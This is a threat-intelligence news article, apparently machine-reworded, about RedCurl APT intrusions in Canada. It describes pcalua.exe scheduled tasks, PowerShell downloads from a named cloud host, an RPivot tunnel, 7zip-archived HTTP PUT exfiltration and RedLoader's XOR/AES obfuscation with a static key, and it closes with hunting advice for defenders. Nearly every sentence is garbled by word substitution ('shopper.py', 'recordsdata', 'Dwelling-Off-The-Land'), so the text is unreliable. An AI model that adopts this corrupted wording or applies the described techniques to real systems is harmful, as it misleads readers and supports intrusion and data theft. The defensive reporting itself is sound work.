Researchers recognized RedCurl APT group exercise in Canada in late 2024, the place the attackers used scheduled duties to execute pcalua.exe to run malicious binaries and Python scripts, together with the RPivot shopper.py script to connect with a distant server.
Proof suggests information exfiltration to cloud storage as this APT group targets numerous industries and goals for long-term persistence for information assortment.
The RedCurl malware leverages PowerShell to obtain recordsdata from a cloud storage location on bora.teracloud[.]jp/dav utilizing HTTP GET requests, that are then unpacked utilizing 7zip with a password saved within the batch file.


The script then makes use of Python to execute shopper.py (a RPivot software from Github) to connect with a predefined IP and port, whereas the malware harvests system data, together with listing listings and working processes, archives and encrypts them with 7zip, and exfiltrates the info again to the C2 server through HTTP PUT requests.
Examine Actual-World Malicious Hyperlinks, Malware & Phishing Assaults With ANY.RUN – Strive for Free
RedLoader, a backdoor part of the RedCurl malware, makes use of obfuscation methods to evade detection by decrypting preliminary DLL names like bcrypt.dll utilizing a rolling XOR routine and dynamically resolves features inside them.


Encrypted perform names are additionally decrypted utilizing the identical technique. Subsequently, resolved features from bcrypt.dll are employed to generate symmetric keys for additional decryption of delicate DLL names.
A SHA256 hash of a static key (“PpMYfs0fQp5ERT”) serves as the premise for producing an AES key, including one other layer of encryption that demonstrates the malicious actor’s intent to hide the malware’s true objective and hinder evaluation.
Adversaries are more and more utilizing living-off-the-land (LOTL) methods to hold out assaults that contain utilizing legit native Home windows binaries and instruments to perform malicious objectives.
This makes it troublesome to tell apart LOTL assaults from regular system administration exercise, as on this case, attackers used pcalua.exe in scheduled duties to execute malicious recordsdata and scripts.


RedCurl makes use of numerous methods to infiltrate the system use legit cloud storage for exfiltration and leverage batch recordsdata, PowerShell, and Python scripts to execute their assaults.
In keeping with Huntress, the extraction of recordsdata from password-protected archives and archive recordsdata for the aim of information exfiltration is basically achieved by way of using 7zip.
Safety analysts can hunt for Python scripts that make community connections or determine processes creating community site visitors on the lookout for Python executables and may search for the 7zip course of with particular flags used for creating password-protected archive recordsdata and deleting the unique recordsdata.
Cyberespionage assaults usually leverage legit software program and Dwelling-Off-The-Land (LOTL) methods to evade detection that necessitating steady monitoring for anomalous conduct.
An efficient protection requires proactive risk looking for novel and strange behaviors throughout the community, as a multi-layered protection technique will increase the probability of figuring out suspicious actions and uncovering subtle assaults by extremely motivated adversaries concentrating on beneficial information.
Discover this Information Attention-grabbing! Observe us on Google Information, LinkedIn, and X to Get Instantaneous Updates!